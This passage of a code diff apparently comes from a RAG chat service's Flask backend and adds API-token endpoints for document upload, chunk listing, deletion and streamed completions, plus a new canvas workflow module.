spec = spec_from_file_location(module_name, page_path)
|
||||
page = module_from_spec(spec)
|
||||
@ -76,9 +81,8 @@ def register_page(page_path):
|
||||
page.manager = Blueprint(page_name, module_name)
|
||||
sys.modules[module_name] = page
|
||||
spec.loader.exec_module(page)
|
||||
|
||||
page_name = getattr(page, 'page_name', page_name)
|
||||
url_prefix = f'/{API_VERSION}/{page_name}'
|
||||
url_prefix = f'/api/{API_VERSION}/{page_name}' if "_api" in path else f'/{API_VERSION}/{page_name}'
|
||||
|
||||
app.register_blueprint(page.manager, url_prefix=url_prefix)
|
||||
return url_prefix
|
||||
@ -86,7 +90,7 @@ def register_page(page_path):
|
||||
|
||||
pages_dir = [
|
||||
Path(__file__).parent,
|
||||
Path(__file__).parent.parent / 'api' / 'apps',
|
||||
Path(__file__).parent.parent / 'api' / 'apps', # FIXME: ragflow/api/api/apps, can be remove?
|
||||
]
|
||||
|
||||
client_urls_prefix = [
|
||||
|
||||
@ -13,18 +13,32 @@
|
||||
# See the License for the specific language governing permissions and
|
||||
# limitations under the License.
|
||||
#
|
||||
import json
|
||||
import os
|
||||
import re
|
||||
from datetime import datetime, timedelta
|
||||
from flask import request
|
||||
from flask import request, Response
|
||||
from flask_login import login_required, current_user
|
||||
from api.db.db_models import APIToken, API4Conversation
|
||||
|
||||
from api.db import FileType, ParserType, FileSource
|
||||
from api.db.db_models import APIToken, API4Conversation, Task, File
|
||||
from api.db.services import duplicate_name
|
||||
from api.db.services.api_service import APITokenService, API4ConversationService
|
||||
from api.db.services.dialog_service import DialogService, chat
|
||||
from api.db.services.document_service import DocumentService
|
||||
from api.db.services.file2document_service import File2DocumentService
|
||||
from api.db.services.file_service import FileService
|
||||
from api.db.services.knowledgebase_service import KnowledgebaseService
|
||||
from api.db.services.task_service import queue_tasks, TaskService
|
||||
from api.db.services.user_service import UserTenantService
|
||||
from api.settings import RetCode
|
||||
from api.settings import RetCode, retrievaler
|
||||
from api.utils import get_uuid, current_timestamp, datetime_format
|
||||
from api.utils.api_utils import server_error_response, get_data_error_result, get_json_result, validate_request
|
||||
from itsdangerous import URLSafeTimedSerializer
|
||||
|
||||
from api.utils.file_utils import filename_type, thumbnail
|
||||
from rag.utils.minio_conn import MINIO
|
||||
|
||||
|
||||
def generate_confirmation_token(tenent_id):
|
||||
serializer = URLSafeTimedSerializer(tenent_id)
|
||||
@ -105,8 +119,8 @@ def stats():
|
||||
res = {
|
||||
"pv": [(o["dt"], o["pv"]) for o in objs],
|
||||
"uv": [(o["dt"], o["uv"]) for o in objs],
|
||||
"speed": [(o["dt"], o["tokens"]/o["duration"]) for o in objs],
|
||||
"tokens": [(o["dt"], o["tokens"]/1000.) for o in objs],
|
||||
"speed": [(o["dt"], float(o["tokens"])/(float(o["duration"]+0.1))) for o in objs],
|
||||
"tokens": [(o["dt"], float(o["tokens"])/1000.) for o in objs],
|
||||
"round": [(o["dt"], o["round"]) for o in objs],
|
||||
"thumb_up": [(o["dt"], o["thumb_up"]) for o in objs]
|
||||
}
|
||||
@ -115,8 +129,7 @@ def stats():
|
||||
return server_error_response(e)
|
||||
|
||||
|
||||
@manager.route('/new_conversation', methods=['POST'])
|
||||
@validate_request("user_id")
|
||||
@manager.route('/new_conversation', methods=['GET'])
|
||||
def set_conversation():
|
||||
token = request.headers.get('Authorization').split()[1]
|
||||
objs = APIToken.query(token=token)
|
||||
@ -131,7 +144,7 @@ def set_conversation():
|
||||
conv = {
|
||||
"id": get_uuid(),
|
||||
"dialog_id": dia.id,
|
||||
"user_id": req["user_id"],
|
||||
"user_id": request.args.get("user_id", ""),
|
||||
"message": [{"role": "assistant", "content": dia.prompt_config["prologue"]}]
|
||||
}
|
||||
API4ConversationService.save(**conv)
|
||||
@ -155,6 +168,7 @@ def completion():
|
||||
e, conv = API4ConversationService.get_by_id(req["conversation_id"])
|
||||
if not e:
|
||||
return get_data_error_result(retmsg="Conversation not found!")
|
||||
if "quote" not in req: req["quote"] = False
|
||||
|
||||
msg = []
|
||||
for m in req["messages"]:
|
||||
@ -171,14 +185,59 @@ def completion():
|
||||
return get_data_error_result(retmsg="Dialog not found!")
|
||||
del req["conversation_id"]
|
||||
del req["messages"]
|
||||
ans = chat(dia, msg, **req)
|
||||
|
||||
if not conv.reference:
|
||||
conv.reference = []
|
||||
conv.message.append({"role": "assistant", "content": ""})
|
||||
conv.reference.append({"chunks": [], "doc_aggs": []})
|
||||
|
||||
def fillin_conv(ans):
|
||||
nonlocal conv
|
||||
if not conv.reference:
|
||||
conv.reference.append(ans["reference"])
|
||||
conv.message.append({"role": "assistant", "content": ans["answer"]})
|
||||
else: conv.reference[-1] = ans["reference"]
|
||||
conv.message[-1] = {"role": "assistant", "content": ans["answer"]}
|
||||
|
||||
def rename_field(ans):
|
||||
for chunk_i in ans['reference'].get('chunks', []):
|
||||
chunk_i['doc_name'] = chunk_i['docnm_kwd']
|
||||
chunk_i.pop('docnm_kwd')
|
||||
|
||||
def stream():
|
||||
nonlocal dia, msg, req, conv
|
||||
try:
|
||||
for ans in chat(dia, msg, True, **req):
|
||||
fillin_conv(ans)
|
||||
rename_field(ans)
|
||||
yield "data:" + json.dumps({"retcode": 0, "retmsg": "", "data": ans}, ensure_ascii=False) + "\n\n"
|
||||
API4ConversationService.append_message(conv.id, conv.to_dict())
|
||||
APITokenService.APITokenService(token)
|
||||
return get_json_result(data=ans)
|
||||
except Exception as e:
|
||||
yield "data:" + json.dumps({"retcode": 500, "retmsg": str(e),
|
||||
"data": {"answer": "**ERROR**: "+str(e), "reference": []}},
|
||||
ensure_ascii=False) + "\n\n"
|
||||
yield "data:"+json.dumps({"retcode": 0, "retmsg": "", "data": True}, ensure_ascii=False) + "\n\n"
|
||||
|
||||
if req.get("stream", True):
|
||||
resp = Response(stream(), mimetype="text/event-stream")
|
||||
resp.headers.add_header("Cache-control", "no-cache")
|
||||
resp.headers.add_header("Connection", "keep-alive")
|
||||
resp.headers.add_header("X-Accel-Buffering", "no")
|
||||
resp.headers.add_header("Content-Type", "text/event-stream; charset=utf-8")
|
||||
return resp
|
||||
else:
|
||||
answer = None
|
||||
for ans in chat(dia, msg, **req):
|
||||
answer = ans
|
||||
fillin_conv(ans)
|
||||
API4ConversationService.append_message(conv.id, conv.to_dict())
|
||||
break
|
||||
|
||||
for chunk_i in answer['reference'].get('chunks',[]):
|
||||
chunk_i['doc_name'] = chunk_i['docnm_kwd']
|
||||
chunk_i.pop('docnm_kwd')
|
||||
|
||||
return get_json_result(data=answer)
|
||||
|
||||
except Exception as e:
|
||||
return server_error_response(e)
|
||||
|
||||
@ -191,6 +250,334 @@ def get(conversation_id):
|
||||
if not e:
|
||||
return get_data_error_result(retmsg="Conversation not found!")
|
||||
|
||||
return get_json_result(data=conv.to_dict())
|
||||
conv = conv.to_dict()
|
||||
for referenct_i in conv['reference']:
|
||||
for chunk_i in referenct_i['chunks']:
|
||||
if 'docnm_kwd' in chunk_i.keys():
|
||||
chunk_i['doc_name'] = chunk_i['docnm_kwd']
|
||||
chunk_i.pop('docnm_kwd')
|
||||
return get_json_result(data=conv)
|
||||
except Exception as e:
|
||||
return server_error_response(e)
|
||||
|
||||
|
||||
@manager.route('/document/upload', methods=['POST'])
|
||||
@validate_request("kb_name")
|
||||
def upload():
|
||||
token = request.headers.get('Authorization').split()[1]
|
||||
objs = APIToken.query(token=token)
|
||||
if not objs:
|
||||
return get_json_result(
|
||||
data=False, retmsg='Token is not valid!"', retcode=RetCode.AUTHENTICATION_ERROR)
|
||||
|
||||
kb_name = request.form.get("kb_name").strip()
|
||||
tenant_id = objs[0].tenant_id
|
||||
|
||||
try:
|
||||
e, kb = KnowledgebaseService.get_by_name(kb_name, tenant_id)
|
||||
if not e:
|
||||
return get_data_error_result(
|
||||
retmsg="Can't find this knowledgebase!")
|
||||
kb_id = kb.id
|
||||
except Exception as e:
|
||||
return server_error_response(e)
|
||||
|
||||
if 'file' not in request.files:
|
||||
return get_json_result(
|
||||
data=False, retmsg='No file part!', retcode=RetCode.ARGUMENT_ERROR)
|
||||
|
||||
file = request.files['file']
|
||||
if file.filename == '':
|
||||
return get_json_result(
|
||||
data=False, retmsg='No file selected!', retcode=RetCode.ARGUMENT_ERROR)
|
||||
|
||||
root_folder = FileService.get_root_folder(tenant_id)
|
||||
pf_id = root_folder["id"]
|
||||
FileService.init_knowledgebase_docs(pf_id, tenant_id)
|
||||
kb_root_folder = FileService.get_kb_folder(tenant_id)
|
||||
kb_folder = FileService.new_a_file_from_kb(kb.tenant_id, kb.name, kb_root_folder["id"])
|
||||
|
||||
try:
|
||||
if DocumentService.get_doc_count(kb.tenant_id) >= int(os.environ.get('MAX_FILE_NUM_PER_USER', 8192)):
|
||||
return get_data_error_result(
|
||||
retmsg="Exceed the maximum file number of a free user!")
|
||||
|
||||
filename = duplicate_name(
|
||||
DocumentService.query,
|
||||
name=file.filename,
|
||||
kb_id=kb_id)
|
||||
filetype = filename_type(filename)
|
||||
if not filetype:
|
||||
return get_data_error_result(
|
||||
retmsg="This type of file has not been supported yet!")
|
||||
|
||||
location = filename
|
||||
while MINIO.obj_exist(kb_id, location):
|
||||
location += "_"
|
||||
blob = request.files['file'].read()
|
||||
MINIO.put(kb_id, location, blob)
|
||||
doc = {
|
||||
"id": get_uuid(),
|
||||
"kb_id": kb.id,
|
||||
"parser_id": kb.parser_id,
|
||||
"parser_config": kb.parser_config,
|
||||
"created_by": kb.tenant_id,
|
||||
"type": filetype,
|
||||
"name": filename,
|
||||
"location": location,
|
||||
"size": len(blob),
|
||||
"thumbnail": thumbnail(filename, blob)
|
||||
}
|
||||
|
||||
form_data=request.form
|
||||
if "parser_id" in form_data.keys():
|
||||
if request.form.get("parser_id").strip() in list(vars(ParserType).values())[1:-3]:
|
||||
doc["parser_id"] = request.form.get("parser_id").strip()
|
||||
if doc["type"] == FileType.VISUAL:
|
||||
doc["parser_id"] = ParserType.PICTURE.value
|
||||
if re.search(r"\.(ppt|pptx|pages)$", filename):
|
||||
doc["parser_id"] = ParserType.PRESENTATION.value
|
||||
|
||||
doc_result = DocumentService.insert(doc)
|
||||
FileService.add_file_from_kb(doc, kb_folder["id"], kb.tenant_id)
|
||||
except Exception as e:
|
||||
return server_error_response(e)
|
||||
|
||||
if "run" in form_data.keys():
|
||||
if request.form.get("run").strip() == "1":
|
||||
try:
|
||||
info = {"run": 1, "progress": 0}
|
||||
info["progress_msg"] = ""
|
||||
info["chunk_num"] = 0
|
||||
info["token_num"] = 0
|
||||
DocumentService.update_by_id(doc["id"], info)
|
||||
# if str(req["run"]) == TaskStatus.CANCEL.value:
|
||||
tenant_id = DocumentService.get_tenant_id(doc["id"])
|
||||
if not tenant_id:
|
||||
return get_data_error_result(retmsg="Tenant not found!")
|
||||
|
||||
#e, doc = DocumentService.get_by_id(doc["id"])
|
||||
TaskService.filter_delete([Task.doc_id == doc["id"]])
|
||||
e, doc = DocumentService.get_by_id(doc["id"])
|
||||
doc = doc.to_dict()
|
||||
doc["tenant_id"] = tenant_id
|
||||
bucket, name = File2DocumentService.get_minio_address(doc_id=doc["id"])
|
||||
queue_tasks(doc, bucket, name)
|
||||
except Exception as e:
|
||||
return server_error_response(e)
|
||||
|
||||
return get_json_result(data=doc_result.to_json())
|
||||
|
||||
|
||||
@manager.route('/list_chunks', methods=['POST'])
|
||||
# @login_required
|
||||
def list_chunks():
|
||||
token = request.headers.get('Authorization').split()[1]
|
||||
objs = APIToken.query(token=token)
|
||||
if not objs:
|
||||
return get_json_result(
|
||||
data=False, retmsg='Token is not valid!"', retcode=RetCode.AUTHENTICATION_ERROR)
|
||||
|
||||
req = request.json
|
||||
|
||||
try:
|
||||
if "doc_name" in req.keys():
|
||||
tenant_id = DocumentService.get_tenant_id_by_name(req['doc_name'])
|
||||
doc_id = DocumentService.get_doc_id_by_doc_name(req['doc_name'])
|
||||
|
||||
elif "doc_id" in req.keys():
|
||||
tenant_id = DocumentService.get_tenant_id(req['doc_id'])
|
||||
doc_id = req['doc_id']
|
||||
else:
|
||||
return get_json_result(
|
||||
data=False, retmsg="Can't find doc_name or doc_id"
|
||||
)
|
||||
|
||||
res = retrievaler.chunk_list(doc_id=doc_id, tenant_id=tenant_id)
|
||||
res = [
|
||||
{
|
||||
"content": res_item["content_with_weight"],
|
||||
"doc_name": res_item["docnm_kwd"],
|
||||
"img_id": res_item["img_id"]
|
||||
} for res_item in res
|
||||
]
|
||||
|
||||
except Exception as e:
|
||||
return server_error_response(e)
|
||||
|
||||
return get_json_result(data=res)
|
||||
|
||||
|
||||
@manager.route('/list_kb_docs', methods=['POST'])
|
||||
# @login_required
|
||||
def list_kb_docs():
|
||||
token = request.headers.get('Authorization').split()[1]
|
||||
objs = APIToken.query(token=token)
|
||||
if not objs:
|
||||
return get_json_result(
|
||||
data=False, retmsg='Token is not valid!"', retcode=RetCode.AUTHENTICATION_ERROR)
|
||||
|
||||
req = request.json
|
||||
tenant_id = objs[0].tenant_id
|
||||
kb_name = req.get("kb_name", "").strip()
|
||||
|
||||
try:
|
||||
e, kb = KnowledgebaseService.get_by_name(kb_name, tenant_id)
|
||||
if not e:
|
||||
return get_data_error_result(
|
||||
retmsg="Can't find this knowledgebase!")
|
||||
kb_id = kb.id
|
||||
|
||||
except Exception as e:
|
||||
return server_error_response(e)
|
||||
|
||||
page_number = int(req.get("page", 1))
|
||||
items_per_page = int(req.get("page_size", 15))
|
||||
orderby = req.get("orderby", "create_time")
|
||||
desc = req.get("desc", True)
|
||||
keywords = req.get("keywords", "")
|
||||
|
||||
try:
|
||||
docs, tol = DocumentService.get_by_kb_id(
|
||||
kb_id, page_number, items_per_page, orderby, desc, keywords)
|
||||
docs = [{"doc_id": doc['id'], "doc_name": doc['name']} for doc in docs]
|
||||
|
||||
return get_json_result(data={"total": tol, "docs": docs})
|
||||
|
||||
except Exception as e:
|
||||
return server_error_response(e)
|
||||
|
||||
|
||||
@manager.route('/document', methods=['DELETE'])
|
||||
# @login_required
|
||||
def document_rm():
|
||||
token = request.headers.get('Authorization').split()[1]
|
||||
objs = APIToken.query(token=token)
|
||||
if not objs:
|
||||
return get_json_result(
|
||||
data=False, retmsg='Token is not valid!"', retcode=RetCode.AUTHENTICATION_ERROR)
|
||||
|
||||
tenant_id = objs[0].tenant_id
|
||||
req = request.json
|
||||
doc_ids = []
|
||||
try:
|
||||
doc_ids = [DocumentService.get_doc_id_by_doc_name(doc_name) for doc_name in req.get("doc_names", [])]
|
||||
for doc_id in req.get("doc_ids", []):
|
||||
if doc_id not in doc_ids:
|
||||
doc_ids.append(doc_id)
|
||||
|
||||
if not doc_ids:
|
||||
return get_json_result(
|
||||
data=False, retmsg="Can't find doc_names or doc_ids"
|
||||
)
|
||||
|
||||
except Exception as e:
|
||||
return server_error_response(e)
|
||||
|
||||
root_folder = FileService.get_root_folder(tenant_id)
|
||||
pf_id = root_folder["id"]
|
||||
FileService.init_knowledgebase_docs(pf_id, tenant_id)
|
||||
|
||||
errors = ""
|
||||
for doc_id in doc_ids:
|
||||
try:
|
||||
e, doc = DocumentService.get_by_id(doc_id)
|
||||
if not e:
|
||||
return get_data_error_result(retmsg="Document not found!")
|
||||
tenant_id = DocumentService.get_tenant_id(doc_id)
|
||||
if not tenant_id:
|
||||
return get_data_error_result(retmsg="Tenant not found!")
|
||||
|
||||
b, n = File2DocumentService.get_minio_address(doc_id=doc_id)
|
||||
|
||||
if not DocumentService.remove_document(doc, tenant_id):
|
||||
return get_data_error_result(
|
||||
retmsg="Database error (Document removal)!")
|
||||
|
||||
f2d = File2DocumentService.get_by_document_id(doc_id)
|
||||
FileService.filter_delete([File.source_type == FileSource.KNOWLEDGEBASE, File.id == f2d[0].file_id])
|
||||
File2DocumentService.delete_by_document_id(doc_id)
|
||||
|
||||
MINIO.rm(b, n)
|
||||
except Exception as e:
|
||||
errors += str(e)
|
||||
|
||||
if errors:
|
||||
return get_json_result(data=False, retmsg=errors, retcode=RetCode.SERVER_ERROR)
|
||||
|
||||
return get_json_result(data=True)
|
||||
|
||||
|
||||
@manager.route('/completion_aibotk', methods=['POST'])
|
||||
@validate_request("Authorization", "conversation_id", "word")
|
||||
def completion_faq():
|
||||
import base64
|
||||
req = request.json
|
||||
|
||||
token = req["Authorization"]
|
||||
objs = APIToken.query(token=token)
|
||||
if not objs:
|
||||
return get_json_result(
|
||||
data=False, retmsg='Token is not valid!"', retcode=RetCode.AUTHENTICATION_ERROR)
|
||||
|
||||
e, conv = API4ConversationService.get_by_id(req["conversation_id"])
|
||||
if not e:
|
||||
return get_data_error_result(retmsg="Conversation not found!")
|
||||
if "quote" not in req: req["quote"] = True
|
||||
|
||||
msg = []
|
||||
msg.append({"role": "user", "content": req["word"]})
|
||||
|
||||
try:
|
||||
conv.message.append(msg[-1])
|
||||
e, dia = DialogService.get_by_id(conv.dialog_id)
|
||||
if not e:
|
||||
return get_data_error_result(retmsg="Dialog not found!")
|
||||
del req["conversation_id"]
|
||||
|
||||
if not conv.reference:
|
||||
conv.reference = []
|
||||
conv.message.append({"role": "assistant", "content": ""})
|
||||
conv.reference.append({"chunks": [], "doc_aggs": []})
|
||||
|
||||
def fillin_conv(ans):
|
||||
nonlocal conv
|
||||
if not conv.reference:
|
||||
conv.reference.append(ans["reference"])
|
||||
else: conv.reference[-1] = ans["reference"]
|
||||
conv.message[-1] = {"role": "assistant", "content": ans["answer"]}
|
||||
|
||||
data_type_picture = {
|
||||
"type": 3,
|
||||
"url": "base64 content"
|
||||
}
|
||||
data = [
|
||||
{
|
||||
"type": 1,
|
||||
"content": ""
|
||||
}
|
||||
]
|
||||
ans = ""
|
||||
for a in chat(dia, msg, stream=False, **req):
|
||||
ans = a
|
||||
break
|
||||
data[0]["content"] += re.sub(r'##\d\$\$', '', ans["answer"])
|
||||
fillin_conv(ans)
|
||||
API4ConversationService.append_message(conv.id, conv.to_dict())
|
||||
|
||||
chunk_idxs = [int(match[2]) for match in re.findall(r'##\d\$\$', ans["answer"])]
|
||||
for chunk_idx in chunk_idxs[:1]:
|
||||
if ans["reference"]["chunks"][chunk_idx]["img_id"]:
|
||||
try:
|
||||
bkt, nm = ans["reference"]["chunks"][chunk_idx]["img_id"].split("-")
|
||||
response = MINIO.get(bkt, nm)
|
||||
data_type_picture["url"] = base64.b64encode(response).decode('utf-8')
|
||||
data.append(data_type_picture)
|
||||
except Exception as e:
|
||||
return server_error_response(e)
|
||||
|
||||
response = {"code": 200, "msg": "success", "data": data}
|
||||
return response
|
||||
|
||||
except Exception as e:
|
||||
return server_error_response(e)
|
||||
162
api/apps/canvas_app.py
Normal file
162
api/apps/canvas_app.py
Normal file
@ -0,0 +1,162 @@
|
||||
#
|
||||
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
|
||||
#
|
||||
# Licensed under the Apache License, Version 2.0 (the "License");
|
||||
# you may not use this file except in compliance with the License.
|
||||
# You may obtain a copy of the License at
|
||||
#
|
||||
# http://www.apache.org/licenses/LICENSE-2.0
|
||||
#
|
||||
# Unless required by applicable law or agreed to in writing, software
|
||||
# distributed under the License is distributed on an "AS IS" BASIS,
|
||||
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||
# See the License for the specific language governing permissions and
|
||||
# limitations under the License.
|
||||
#
|
||||
import json
|
||||
from functools import partial
|
||||
|
||||
from flask import request, Response
|
||||
from flask_login import login_required, current_user
|
||||
|
||||
from api.db.db_models import UserCanvas
|
||||
from api.db.services.canvas_service import CanvasTemplateService, UserCanvasService
|
||||
from api.utils import get_uuid
|
||||
from api.utils.api_utils import get_json_result, server_error_response, validate_request
|
||||
from graph.canvas import Canvas
|
||||
|
||||
|
||||
@manager.route('/templates', methods=['GET'])
|
||||
@login_required
|
||||
def templates():
|
||||
return get_json_result(data=[c.to_dict() for c in CanvasTemplateService.get_all()])
|
||||
|
||||
|
||||
@manager.route('/list', methods=['GET'])
|
||||
@login_required
|
||||
def canvas_list():
|
||||
return get_json_result(data=sorted([c.to_dict() for c in \
|
||||
UserCanvasService.query(user_id=current_user.id)], key=lambda x: x["update_time"]*-1)
|
||||
)
|
||||
|
||||
|
||||
@manager.route('/rm', methods=['POST'])
|
||||
@validate_request("canvas_ids")
|
||||
@login_required
|
||||
def rm():
|
||||
for i in request.json["canvas_ids"]:
|
||||
UserCanvasService.delete_by_id(i)
|
||||
return get_json_result(data=True)
|
||||
|
||||
|
||||
@manager.route('/set', methods=['POST'])
|
||||
@validate_request("dsl", "title")
|
||||
@login_required
|
||||
def save():
|
||||
req = request.json
|
||||
req["user_id"] = current_user.id
|
||||
if not isinstance(req["dsl"], str): req["dsl"] = json.dumps(req["dsl"], ensure_ascii=False)
|
||||
|
||||
req["dsl"] = json.loads(req["dsl"])
|
||||
if "id" not in req:
|
||||
if UserCanvasService.query(user_id=current_user.id, title=req["title"].strip()):
|
||||
return server_error_response(ValueError("Duplicated title."))
|
||||
req["id"] = get_uuid()
|
||||
if not UserCanvasService.save(**req):
|
||||
return server_error_response("Fail to save canvas.")
|
||||
else:
|
||||
UserCanvasService.update_by_id(req["id"], req)
|
||||
|
||||
return get_json_result(data=req)
|
||||
|
||||
|
||||
@manager.route('/get/<canvas_id>', methods=['GET'])
|
||||
@login_required
|
||||
def get(canvas_id):
|
||||
e, c = UserCanvasService.get_by_id(canvas_id)
|
||||
if not e:
|
||||
return server_error_response("canvas not found.")
|
||||
return get_json_result(data=c.to_dict())
|
||||
|
||||
|
||||
@manager.route('/completion', methods=['POST'])
|
||||
@validate_request("id")
|
||||
@login_required
|
||||
def run():
|
||||
req = request.json
|
||||
stream = req.get("stream", True)
|
||||
e, cvs = UserCanvasService.get_by_id(req["id"])
|
||||
if not e:
|
||||
return server_error_response("canvas not found.")
|
||||
|
||||
if not isinstance(cvs.dsl, str):
|
||||
cvs.dsl = json.dumps(cvs.dsl, ensure_ascii=False)
|
||||
|
||||
final_ans = {"reference": [], "content": ""}
|
||||
try:
|
||||
canvas = Canvas(cvs.dsl, current_user.id)
|
||||
if "message" in req:
|
||||
canvas.messages.append({"role": "user", "content": req["message"]})
|
||||
canvas.add_user_input(req["message"])
|
||||
answer = canvas.run(stream=stream)
|
||||
print(canvas)
|
||||
except Exception as e:
|
||||
return server_error_response(e)
|
||||
|
||||
assert answer, "Nothing. Is it over?"
|
||||
|
||||
if stream:
|
||||
assert isinstance(answer, partial)
|
||||
|
||||
def sse():
|
||||
nonlocal answer, cvs
|
||||
try:
|
||||
for ans in answer():
|
||||
for k in ans.keys():
|
||||
final_ans[k] = ans[k]
|
||||
ans = {"answer": ans["content"], "reference": ans.get("reference", [])}
|
||||
yield "data:" + json.dumps({"retcode": 0, "retmsg": "", "data": ans}, ensure_ascii=False) + "\n\n"
|
||||
|
||||
canvas.messages.append({"role": "assistant", "content": final_ans["content"]})
|
||||
if final_ans.get("reference"):
|
||||
canvas.reference.append(final_ans["reference"])
|
||||
cvs.dsl = json.loads(str(canvas))
|
||||
UserCanvasService.update_by_id(req["id"], cvs.to_dict())
|
||||
except Exception as e:
|
||||
yield "data:" + json.dumps({"retcode": 500, "retmsg": str(e),
|
||||
"data": {"answer": "**ERROR**: " + str(e), "reference": []}},
|
||||
ensure_ascii=False) + "\n\n"
|
||||
yield "data:" + json.dumps({"retcode": 0, "retmsg": "", "data": True}, ensure_ascii=False) + "\n\n"
|
||||
|
||||
resp = Response(sse(), mimetype="text/event-stream")
|
||||
resp.headers.add_header("Cache-control", "no-cache")
|
||||
resp.headers.add_header("Connection", "keep-alive")
|
||||
resp.headers.add_header("X-Accel-Buffering", "no")
|
||||
resp.headers.add_header("Content-Type", "text/event-stream; charset=utf-8")
|
||||
return resp
|
||||
|
||||
canvas.messages.append({"role": "assistant", "content": final_ans["content"]})
|
||||
if final_ans.get("reference"):
|
||||
canvas.reference.append(final_ans["reference"])
|
||||
cvs.dsl = json.loads(str(canvas))
|
||||
UserCanvasService.update_by_id(req["id"], cvs.to_dict())
|
||||
return get_json_result(data=req["dsl"])
|
||||
|
||||
|
||||
@manager.route('/reset', methods=['POST'])
|
||||
@validate_request("id")
|
||||
@login_required
|
||||
def reset():
|
||||
req = request.json
|
||||
try:
|
||||
e, user_canvas = UserCanvasService.get_by_id(req["id"])
|
||||
if not e:
|
||||
return server_error_response("canvas not found.")
|
||||
|
||||
canvas = Canvas(json.dumps(user_canvas.dsl), current_user.id)
|
||||
canvas.reset()
|
||||
req["dsl"] = json.loads(str(canvas))
|
||||
UserCanvasService.update_by_id(req["id"], {"dsl": req["dsl"]})
|
||||
return get_json_result(data=req["dsl"])
|
||||
except Exception as e:
|
||||
return server_error_response(e)
|
||||
@ -20,8 +20,9 @@ from flask_login import login_required, current_user
|
||||
from elasticsearch_dsl import Q
|
||||
|
||||
from rag.app.qa import rmPrefix, beAdoc
|
||||
from rag.nlp import search, huqie
|
||||
from rag.utils import ELASTICSEARCH, rmSpace
|
||||
from rag.nlp import search, rag_tokenizer, keyword_extraction
|
||||
from rag.utils.es_conn import ELASTICSEARCH
|
||||
from rag.utils import rmSpace
|
||||
from api.db import LLMType, ParserType
|
||||
from api.db.services.knowledgebase_service import KnowledgebaseService
|
||||
from api.db.services.llm_service import TenantLLMService
|
||||
@ -37,7 +38,7 @@ import re
|
||||
@manager.route('/list', methods=['POST'])
|
||||
@login_required
|
||||
@validate_request("doc_id")
|
||||
def list():
|
||||
def list_chunk():
|
||||
req = request.json
|
||||
doc_id = req["doc_id"]
|
||||
page = int(req.get("page", 1))
|
||||
@ -124,10 +125,10 @@ def set():
|
||||
d = {
|
||||
"id": req["chunk_id"],
|
||||
"content_with_weight": req["content_with_weight"]}
|
||||
d["content_ltks"] = huqie.qie(req["content_with_weight"])
|
||||
d["content_sm_ltks"] = huqie.qieqie(d["content_ltks"])
|
||||
d["content_ltks"] = rag_tokenizer.tokenize(req["content_with_weight"])
|
||||
d["content_sm_ltks"] = rag_tokenizer.fine_grained_tokenize(d["content_ltks"])
|
||||
d["important_kwd"] = req["important_kwd"]
|
||||
d["important_tks"] = huqie.qie(" ".join(req["important_kwd"]))
|
||||
d["important_tks"] = rag_tokenizer.tokenize(" ".join(req["important_kwd"]))
|
||||
if "available_int" in req:
|
||||
d["available_int"] = req["available_int"]
|
||||
|
||||
@ -135,8 +136,11 @@ def set():
|
||||
tenant_id = DocumentService.get_tenant_id(req["doc_id"])
|
||||
if not tenant_id:
|
||||
return get_data_error_result(retmsg="Tenant not found!")
|
||||
|
||||
embd_id = DocumentService.get_embd_id(req["doc_id"])
|
||||
embd_mdl = TenantLLMService.model_instance(
|
||||
tenant_id, LLMType.EMBEDDING.value)
|
||||
tenant_id, LLMType.EMBEDDING.value, embd_id)
|
||||
|
||||
e, doc = DocumentService.get_by_id(req["doc_id"])
|
||||
if not e:
|
||||
return get_data_error_result(retmsg="Document not found!")
|
||||
@ -149,9 +153,9 @@ def set():
|
||||
if len(arr) != 2:
|
||||
return get_data_error_result(
|
||||
retmsg="Q&A must be separated by TAB/ENTER key.")
|
||||
q, a = rmPrefix(arr[0]), rmPrefix[arr[1]]
|
||||
q, a = rmPrefix(arr[0]), rmPrefix(arr[1])
|
||||
d = beAdoc(d, arr[0], arr[1], not any(
|
||||
[huqie.is_chinese(t) for t in q + a]))
|
||||
[rag_tokenizer.is_chinese(t) for t in q + a]))
|
||||
|
||||
v, c = embd_mdl.encode([doc.name, req["content_with_weight"]])
|
||||
v = 0.1 * v[0] + 0.9 * v[1] if doc.parser_id != ParserType.QA else v[1]
|
||||
@ -201,11 +205,11 @@ def create():
|
||||
md5 = hashlib.md5()
|
||||
md5.update((req["content_with_weight"] + req["doc_id"]).encode("utf-8"))
|
||||
chunck_id = md5.hexdigest()
|
||||
d = {"id": chunck_id, "content_ltks": huqie.qie(req["content_with_weight"]),
|
||||
d = {"id": chunck_id, "content_ltks": rag_tokenizer.tokenize(req["content_with_weight"]),
|
||||
"content_with_weight": req["content_with_weight"]}
|
||||
d["content_sm_ltks"] = huqie.qieqie(d["content_ltks"])
|
||||
d["content_sm_ltks"] = rag_tokenizer.fine_grained_tokenize(d["content_ltks"])
|
||||
d["important_kwd"] = req.get("important_kwd", [])
|
||||
d["important_tks"] = huqie.qie(" ".join(req.get("important_kwd", [])))
|
||||
d["important_tks"] = rag_tokenizer.tokenize(" ".join(req.get("important_kwd", [])))
|
||||
d["create_time"] = str(datetime.datetime.now()).replace("T", " ")[:19]
|
||||
d["create_timestamp_flt"] = datetime.datetime.now().timestamp()
|
||||
|
||||
@ -221,13 +225,18 @@ def create():
|
||||
if not tenant_id:
|
||||
return get_data_error_result(retmsg="Tenant not found!")
|
||||
|
||||
embd_id = DocumentService.get_embd_id(req["doc_id"])
|
||||
embd_mdl = TenantLLMService.model_instance(
|
||||
tenant_id, LLMType.EMBEDDING.value)
|
||||
tenant_id, LLMType.EMBEDDING.value, embd_id)
|
||||
|
||||
v, c = embd_mdl.encode([doc.name, req["content_with_weight"]])
|
||||
DocumentService.increment_chunk_num(req["doc_id"], doc.kb_id, c, 1, 0)
|
||||
v = 0.1 * v[0] + 0.9 * v[1]
|
||||
d["q_%d_vec" % len(v)] = v.tolist()
|
||||
ELASTICSEARCH.upsert([d], search.index_name(tenant_id))
|
||||
|
||||
DocumentService.increment_chunk_num(
|
||||
doc.id, doc.kb_id, c, 1, 0)
|
||||
return get_json_result(data={"chunk_id": chunck_id})
|
||||
except Exception as e:
|
||||
return server_error_response(e)
|
||||
@ -253,8 +262,19 @@ def retrieval_test():
|
||||
|
||||
embd_mdl = TenantLLMService.model_instance(
|
||||
kb.tenant_id, LLMType.EMBEDDING.value, llm_name=kb.embd_id)
|
||||
ranks = retrievaler.retrieval(question, embd_mdl, kb.tenant_id, [kb_id], page, size, similarity_threshold,
|
||||
